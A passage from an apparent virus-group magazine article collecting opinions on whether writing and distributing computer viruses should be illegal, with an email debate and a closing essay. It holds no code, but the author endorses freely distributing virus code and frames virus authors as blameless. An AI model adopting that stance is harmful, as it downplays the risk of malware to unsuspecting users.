clear-cut, 100% absolute definition of a computer virus is. If it's just something that remains in memory and does something the user is not fully aware of, you're eliminating a significant number of useful programs such as disk caches and even virus scanners--how many people are fully aware of the mechanical workings of a virus scanner or a disk cache? Other definitions can be twisted in similar manners, making just about everything a "virus" in some aspect. -------------------------- From Oliver in the UK: I believe that it should not only be Federally illegal, but Internationally illegal to write a computer virus. However, one should look at the difficulty of enforcing such a law. From what point onwards does a program qualify as a virus; those questions, looking at the heated regular debate on virus-l, are far from being answered categorically. The bottom line, IMHO, is that enforcement of a federal law against computer viruses writing is very hard. Moreover, most academic and company sites forbid their users in using computing facilities for writing viruses anyway, and it should be up to them to make sure locally that no viruses are written on their facilities. -------------------------- From Jay: Of course not, this is a first amendment right in the USA. Writing a virus is no different than writing any other computer program. Many "normal" computer programs share common coding methods with viruses. Who is to say that you intend malice by writing a small chunk of software? Are we supposed to sit down and have code reviews with federal agents in random spot checks to make sure we aren't writing malicious code? That's silly. -------------------------- From Ed: No. This is not the correct way to deal with the virus problem. Any form of restriction placed upon what someone does with their own computer would be unconstitutional, as it removes our personal rights. It has been said that the more numerous the laws, the more corrupt the state. As the law stands, you can do what you want out *your* computer, but as soon as you infect *mine* it becomes illegal, and that is the way it must remain, or else the rights of everyone will be damaged. ******************************************************************************* 2) Should it be Federally illegal to distribute computer viruses, to KNOWING individuals (ie on "virus" boards)? (This does NOT mean infecting another person with a virus - it means giving them a copy of a virus, and making sure they KNOW it is a virus) ******************************************************************************* David: "Again, no. The distribution of information should be constitutionally protected. There are legitimate reasons why someone may want or need the source or executable form of a virus. The most obvious is in the field of virus research. It is necessary to obtain the virus in question in order to devise a vaccine for it. Security through obscurity has been tried before; it's great until some "unauthorized" person gets hold of some information others are hiding. He's free to use it to great success because the legitimate users don't know exactly what he's got, making it hard to devise a defense. A good example of this type of argument might be: Criminals have guns. It should be illegal to have a gun. In fact, let's keep the "knowing individuals" (ie. the police) from having them too... " ___________________________ From: an11445@anon.penet.fi: just because you make sure they KNOW it's a virus does not mean they will not do some destructive thing with it, perhaps even unintentionally. in my paper, 'circular time line model for addressing the impact of virus exchange bbs', i support the conclusion that it will not especially help to do this, and that it may not be even the most efficient way to deal with the problem of computer viruses. if people will not do the things that are right, however, they force people to do the things that are wrong, in this case. --------------------------- From: an10445@anon.penet.fi (Cutthroat): No. A weak system can be hit by a virus. A strong system is less likely to be hit by a virus. Make computers more secure. Viruses will always exist. --------------------------- From: an2284@anon.penet.fi > 2) Should it be Federally illegal to distribute computer viruses, > to KNOWING individuals (ie on "virus" boards)? (This does NOT > mean infecting another person with a virus - it means giving > them a copy of a virus, and making sure they KNOW it is a virus) Nope. It's just *executable* code this time. :-) --------------------------- From: an11290@anon.penet.fi: (Roger) > 2) Should it be Federally illegal to distribute computer viruses, > to KNOWING individuals (ie on "virus" boards)? (This does NOT > mean infecting another person with a virus - it means giving > them a copy of a virus, and making sure they KNOW it is a virus) Following the reasoning in the answer to the last question: yes. However I think there is a difference between distributing the actual code and only pseudo code. It's like telling someone the principle of an atom bomb, or sending him a "do it yourself kit". The last is certainly beyond the limit, whereas the first isn't. --------------------------- From Josh@lehigh: Doing so would absolutely cripple virus-fighting developments. If a user cannot legally send a virus-infected program to the author of a virus scanner/cleaner, it becomes impossible for the utility to detect and/or remove that type of virus unless the author somehow becomes accidentally infected by it. --------------------------- From Oliver in the UK: > 2) Should it be Federally illegal to distribute computer viruses, > to KNOWING individuals (ie on "virus" boards)? (This does NOT > mean infecting another person with a virus - it means giving > them a copy of a virus, and making sure they KNOW it is a virus) Yes. Virus boards, etc. are all nests for hackers-crackers & people envolved in the "computer-underworld". Distribution of sources on BBS to knowing individuals can only add to the spread of computer viruses. In addition to that, so many people would then be able to modify the original source code, that one would end-up with a virtually unlimited number of variants of each virus - definitely the horror scenario. --------------------------- From Paul Ferguson: That depends. If it can be proven in a court of law that the provider of the computer virus knew before-hand that recipient would irresponsibly allow it to pass into the hands of someone who would a.) willingly transplant it into an unsuspecting public domain or b.) modify it and then release it into an unsuspecting public domain, then YES, I believe that is wrongful action that should be illegal. If the program (virus) is passed amongst two trusted individuals with little or no chance of it "escaping" into the public domain, then that is a matter of personal transaction which does not affect other computerists. --------------------------- From Jay: > 2) Should it be Federally illegal to distribute computer viruses, > to KNOWING individuals (ie on "virus" boards)? (This does NOT > mean infecting another person with a virus - it means giving > them a copy of a virus, and making sure they KNOW it is a virus) Of course not, if you write a note on a piece of paper and share it with a friend, is that a federal offense? What if that note contains information that could show your friend how to kill someone? What if the note contains a beautiful little poem that happens to describes how to kill someone? Software is a vehicle for expressing an idea or concept, no different from the written word. If there is no malice, there is no crime. It's not illegal to infect someone with a virus if you don't know that you passed it along, so why should it be illegal to give away a virus to someone who can handle it? --------------------------- From Ed: > Should the distribution of viruses to knowing individuals be illegal? Again, no. One reason is that I doubt very many virus authors would heed such a law, and so only the anti-virus community would suffer, making conditions worse. Another reason is the First Ammendment of the Constitution of the United States, which guarantees freedom of speech to everyone. Distribution of viral code is a form of speech, as it is a transfer of data and information. If it weren't for virus transactions, no one virus scanner would be very complete, as each would only detect a handful of viruses, and one would have to obtain a copy of every scanner to have a complete detection system. ******************************************************************************* 3) If executable virus code is illegal, then should the SOURCE code to the viruses be illegal to copy, sell, or other wise distribute? ******************************************************************************* David: "I don't agree that either should be illegal, but outlawing the source would make it much more difficult to devise a defense. It's an extension of the above argument..." ---------------------------- From: an11445@anon.penet.fi: >> 3) If executable virus code is illegal, then should the SOURCE code >> to the viruses be illegal to copy, sell, or other wise distribute? If, then; else not. but should be not to begin with. ---------------------------- From: an11184@anon.penet.fi The answers arise from my views about individual freedom for every human. Governments should interfere as little as possible in this. --------------------------- From: an10445@anon.penet.fi (Cutthroat): No. A virus is less likely to be "accidently" released if it exists only as source code. Viruses are much easier to study for "legitimate" security purposes if it is released as source code. --------------------------- From Josh@lehigh: For similar reasons to 1) above, the thought is abhorrent. Taking an extreme example, suppose I was to write a compiler. The source code for this compiler consists of any text file, and its output is a file infector which randomly stamps the source code (text file) on someone's hard drive. Therefore, your resume, your letters--in short, any text you have whatsoever--becomes source code for a virus. Big brother returns--and with a vengeance. --------------------------- From Oliver in the UK: > 3) If executable virus code is illegal, then should the SOURCE code > to the viruses be illegal to copy, sell, or other wise distribute? See the answer to 2. The SOURCE code is even more lethal than the executable. The only way that such code would be transfered, should be for research purposes. I am talking here about serious scientific research. The more people that have access to source viral code, the more likely it is for non-authorised people to have access to it. In scientific research, a researcher has access to chemicals & data which (s)he is often not entitled to take out of the lab. The same should be for viral code. The argument of making Viral Code available to the public "because this is the only way to get to know about computer viruses" is hence a stupid argument. The sole purpose of releasing viral source code to the public is misleadingly "for informational purposes only" and can alas only lead to further propagation of the virus itself, as well as new variants. --------------------------- From Paul Ferguson: Executable code of any kind should not ever (and will not, IMHO) be illegal. That is absurd. It is the use of said code that would constitute a violation of another's practice of safe computing. If this code (viruses) are released into the public domain, I consider it a practice of reckless computing. Hey, we have laws against reckless driving and reckless endangerment, why not reckless computing? --------------------------- From Jay: > 3) If executable virus code is illegal, then should the SOURCE code > to the viruses be illegal to copy, sell, or other wise distribute? Executable code shouldn't be illegal. Is it illegal to translate a book from English to Spanish? Can you translate a book from English to Spanish without knowing either language? You CAN convert source code to executable code without knowing the source language, or assembly/machine code. Let's assume that I was to give a computer illiterate friend, a floppy containing source code to computer mortgage payments, a public domain compiler, and instructions for compiling the application, "type MAKE". Lets also assume that I received the source code from someone else, and the code contained a virus hidden in the source (in source code form) that I was unaware of. If the friend follows the instructions, and compiles the virus did he break the law? He thought he was just getting a program to calculate mortgage payments. Am I guilty of a crime? I just gave a friend some innocent source code. This is ludicrous. If source code for a virus causes no problems for either the giver or receiver, why should it be banned? If I write a book that contains a series of instructions that detail a plan to overthrow the US goverment, is that a crime? If I sell the book, is that criminal? Tom Clancy does it...he sells millions. If I write a book that details instructions for overthrowing MSDOS, is that crime? What if I choose distribute it electronically? This is all stupid, prohibiting information doesn't work. The bottom line is that if an act was done with malice, there may be a crime, if the act was done without malice, there is no crime. --------------------------- From Ed: > If executable virus transfer is made illegal, should source code be > restricted as well? I would prefer that neither are made illegal, but if this situation were to arise, I would have to say no. Source code qualifies for the First Ammendment more so than viral samples. Now, I'm not saying it's justified to go and give source code to anyone who asks for it, after all why do you think there are so many variants of Vienna and Pixel? But legal action used to restrict the actual transactions of viral material is not a valid course of action, practically or ethically. I can not condone distribution of viral samples to anyone who asks for it (especially "Nuke-EM!!" types), however I've found that many anti-viral researchers simply can't obtain the samples they need because they aren't in the "inner circle" of trusted anti-virus vendors. It's a very difficult issue to deal with, as to how to deal with virus distribution, such as who should be allowed to procure the viruses they need, and who shouldn't. It's an ethical and moral delemma, but one this is for sure, it should not be illegal! ***************************************************************************** Please mail me with YOUR opinions to the above, and feel free to explain your views, or present other opinions you may have. ***************************************************************************** From: an11445@anon.penet.fi: There are already enough laws in existance. we do not need more laws. we need people who know how to interpret the existing laws in light of the societal and technological changes in our society. --------------------------- From Marc: There is no statement of illegality in this domain that wouldn't lead inexorably to the licensing of anti-virus software developers and the stifling of most forms of independent research into system security. You would end up with the same kind of idiocy that makes it impossible to use certain drugs as medicines or even to do research with them. You would also end up having to give the police extraordinary powers to enable enforcement, as in all cases of victimless crime. --------------------------- ---------------------------------------------------------------------------- Note From DecimatoR: The following conversation was between myself and Oliver, the one person who stated that everything dealing with the creation of viruses should be internationally controlled. Since his opinions differed so strongly from mine, and most of those I recieved, I chose to include our conversation here, unedited. I appreciate the time he took in corresponding with me. Thanks, guy. ---------------------------------------------------------------------------- (The quoted text is from me, the others from him. Like you couldn't tell) From Oliver: Hello, I got your 2 emails regarding the fact that I was the only person to favour a full clampdown on viruses etc. Let me answer the direct questions in your 2 emails: >Your response so far has been the only one which out-and-out said that YES, >viruses, source code for them, etc should be internationally illegal. I >actually thought there would be more opinions like yours, however this seems >not to be the case. So, if you don't mind, I'd like a little more insight >into your ideas. I noticed you were from London, where there have recently >been arrests of people who write and sell viruses. I assume you agree that >the government has the right to make such an arrest. My question to you: Yes, I agree with the government regarding those arrests. >where do you draw the line regarding censorship? Many respondents claimed >that banning the writing of viruses would be censorship, to an extreme they >are NOT willing to tolerate. You think differently. So, where do you think >the line should be drawn? With viruses? Maybe "trojanized" code? Or code >that will disable itself after x number of runs? This is a very difficult line to draw. I think that the first selection that one must make is whether the code is to destroy data, or will simply replicate (like a worm). The easiest piece of code to look at is trojanized code. Its sole purpose is usually to destroy data. I qualify purpose- made trojanized code as malicious vandalism. In addition to that, "trojanization" of a commercial or public domain program itself already breaks the law due to copyright infringements and/or license breaches. Viruses are, also by definition, data destructors. Anyone writing a virus and planning to distribute it should hence also be breaking the law. Worms are supposed not to destroy data; however let us consider the fact that a worm spreads on computer systems and a bug in the worm's code corrupts user data. What I am trying to get to is the fact that worms spread in people's machines without their approval, and I find this to be morally wrong. Compare this with, say, skeleton keys of apartments in a town. Would you support the idea of making skeleton keys, exchanging them on "skeleton-key-BBS" legal ? It would mean that it's legal for anyone to have skeleton keys and use them to "visit" apartments at will. So here, we are reaching the fact that a computer's HD has now grown to be part of someone's house, someone's belongings, someone's living space, and that any breach of privacy is unwelcome. Since worms breach that privacy, then wouldn't it be a protection for the public to outlaw those worms ? So I support the fact of making all code that self-replicates from system to system illegal. >Doesn't the intervention of the government in such areas bother you? If >not, why not? Obviously your opinions are quite different than mine. No. The government has many duties towards the people of a country, and one of them is protection of the people themselves. Remember, I am not asking for the government to censor ideas, I am asking for it to stop propagation of malicious items; people often refer to this as censorship since we're talking about intellectual data, but this is a big mistake. I believe that freedom will be more easily enforceable if simple basic laws of morals can be enforced. Consider gun laws: - in UK, gun laws are very tough indeed. No individual is allowed to carry a gun without special permits, and those are extremely hard to obtain. Individuals allowed to carry a gun are usually under threat from terrorism, etc. Those are very isolated cases. As a result, the British police is mostly still unarmed. The number of gun-related offenses is very low indeed, and any injury is usually caused by knives. As a result, repression from the British police needs not be so strong. - in USA, in some states, gun laws are very relaxed. Gun-related offenses are high, and the US police needs to carry guns as well. The amount of repression used by the police has to be much higher than elsewhere. I was shocked to hear that police in USA had their gun out when stopping a car for speeding. How "friendly" does that make them ? Pro-gun individuals would immediately shout that any clamping-down on guns is a breach of their freedom, etc. etc. And they even have an advantage over pro-virus-enthusiasts that they can argue that the gun is for their safety, while I can't think of a positive use for a virus. >is a good thing, because I am looking for differing points of view. I >consider England to be far too strict in censorship, and government control. >It would really bother me to have to put up with that kind of control over >my life. Yet you seem to agree with it. Agreed, there are a few things which the UK government censors that I don't agree with. But take, for example, the freedom of the press: - Should newspapers have the right to write *anything* about *anyone* ? Freedom of speech in this case is only possible if newspaper editors are reasonable about what they write. But what often happens is that editors praise their "freedom of speech" and allow defammatory articles, made-up of lies, etc., thus hurting individuals to such an extent that those individuals may have their life affected by that so-called "freedom- of-speech" forever. Full open democracy, full freedom of speech, full openness only works when everybody is nice and kind, and no-one is malicious etc. But this unfortu- nately isn't the case in real life. Censorship has to be applied in areas which could hurt more people than help them. >like your answers to a few more in-depth questions. First of all, many who >responded said that banning viruses would be a form of censorship, one which >they would not be willing to tolerate. How would you reply to this? Censorship applies both to intellectual ideas, as well as material ideas. The only thing that people make mistakes about is believing that censorship of intellectual ideas is bad, and censorship of things (something which may be dangerous to them - say a chemical) is okay. The big mistake made is to think that intellectual ideas may not hurt them. Computer viruses are thought of as intellectual ideas, and thus people usually adopt a soft policy towards them by thinking that it cannot hurt them. >ALso, I believe you are from England, what do you think of the recent raids >on virus writers, and the man who was selling virueses in your country? >Good? Bad? I completely agree with the government on those matters. What good to society are virus writers ? Their sole purpose was to spread their viruses worldwide. Their initial statement (which I didn't keep a copy of, unfortunately, thinking it was a joke) was so childishly written, I could not believe it, but let's not divert to talk about the personality of some virus writers. The fact is clear: Viruses can do more harm than a lot of other things in life. Have you ever witnessed someone who has made no backup of his work, and has had much of his work destroyed by a virus ? We aren't talking here about a corrupted copy of Windows 3.1 that can be re-installed in 30 minutes but about 1 week's original work from somebody. I personally haven't been hit, but I have seen people in the labs here, and believe me, it's time we stop treating virus-writers as "joyful hackers" that do this for fun. >And lastly, a question: do you write computer programs? If so, then doesn't >it bother you knowing that you are _not_allowed_ to write a certain KIND of >program, simply because the government considers it "bad"? I write computer programs daily, in the course of my research (which is unrelated to viruses). I use my programming skills to develop systems not only for my benefit but also for the benefit of mankind, through better future telecommunication systems. My competence in programming is high enough to write viruses, trojans, etc. but I am not attracted to it whatsoever. If those programming geniuses (aka virus writers), devoted their programming time to other activities than virus writing, than perhaps they would be able to make something out of their life, instead or ruining other people's. But let's imagine that I was interested in writing a virus. Who would know ? If I wrote a virus on my PC at home, and not release it, not publicize it, not mention it to anyone, who would know ? If then I made a mistake, and transfered it (against my will) to my computer at work, and infected computers all around the place, then whose fault would it be ? Mine. I would then have to be ready to face the consequences. >think censorship and banning of code should go? And, for those who violate >the bans, what punishment do you believe is suitable? Banning of the code, IMHO, should be as far as public posting of the source on BBS, distribution by any means, infection of any computer. I am hesitating about banning the publication of flow charts for the code, since this would involve a fair amount of work from potential copycats. But banning of full-working virus sources is certainly a priority. I am not a lawyer, so it would be hard for me to expand on the form of punishment for those violating the bans. I think that each case should have to be taken separately, depending on the potential danger of each piece of code, and also on the damage already inflicted (if any) before the trial. Cheers, Oliver -------------------------- Final note from Dec: -------------------------- All in all, the majority response was that no, the coding of and distributing of virus code should _not_ be outlawed in the United States. Of course, I certainly feel the same way. The government should NOT be able to say that any piece of code, no matter what the purpose or possible use may be, should not be written. Programming is freedom of expression, and to some, even art. To limit that with laws and stipulations not only takes away the rights of ALL Americans, but goes against the freedoms that America was founded upon. No matter what your point of view on viruses - be they ethical, unethical, whether you write them or hunt them down and destroy them, I truly hope you would never want them to be outlawed. Of course, I should mention my views concerning the spreading of viruses to unknowing users. I firmly believe that such action IS unethical, and, quite simply, wrong. And yes, that action SHOULD be made illegal. Many of the respondees to my post compared the legallities of viruses with those of firearms. While this may be a valid comparison in some cases, in others it is quite unrealistic. Most who used this idea said that virus code should be restricted to those responsible enough to handle it, just like guns are restricted to those who are responsible. I have a small problem with this. Firearms are restricted because they can be used to cause serious or fatal injuries. No computer virus can be used to kill another person. However, no gun actually KILLS another person. People kill people, the gun is simply an instrument used. Maybe a knife would be a better comparison. Just becuase murders are committed with knives, should we restrict them? OR ban them outright? No, of course not. Same with viruses. Although they have the potential to be used in destructive ways, they should not be banned. The people who abuse them should be treated as the criminals they are. The people who create and help educate others with them should not be treated as criminals. We in Phalcon/Skism all believe in the freedom of information, and the right that each and every American has to his own opinions. Yes, we've written viruses, and yes, we have no qualms about distributing virus code. (This magazine is one good example) No one will be injured through our actions, because we simply cranked out this 100% ascii text magazine. We don't spread our creations intentionally. We do distribute them to those who want them, and sometimes people do spread them. We cannot control the actions of others. Breaking the law is wrong. We don't break the law by programming. We don't break the law by sharing code. Don't hold us responsible for those who use our creations to break the law. After all, you wouldn't hold Smith and Wesson responsible for a crime committed using one of their firearms, would you? No. Nor would you hold GMC, Inc. responsible for a death caused by a drunk driving one of their vehicles. They were not at fault for creating the vehicle. The drunk was at fault for acting the way he did. Same goes for viruses, and virus authors. Don't place the blame on the wrong party. There is a strong difference between creation and abuse. Next time you ponder the legality of virus writing, think about this. You wouldn't want cars banned just because a few people don't handle them responsibly. Attack the criminal, not the creator. And NEVER take away a person's right to create. --DecimatoR Phalcon/Skism Author's Note: This article is dedicated to the members of the ARCV, a England based group of virus authors, who were arrested, jailed, and had their equipment confiscated, simply because they chose to express themselves through the creation of self- replicating code. This is also dedicated to the man arested by Scotland Yard on December 10th, for advertising to sell virus code in the UK. I hope to God that NEVER would ANYONE in America need to fear for their freedom, simply because they chose to program a computer or sell public domain code.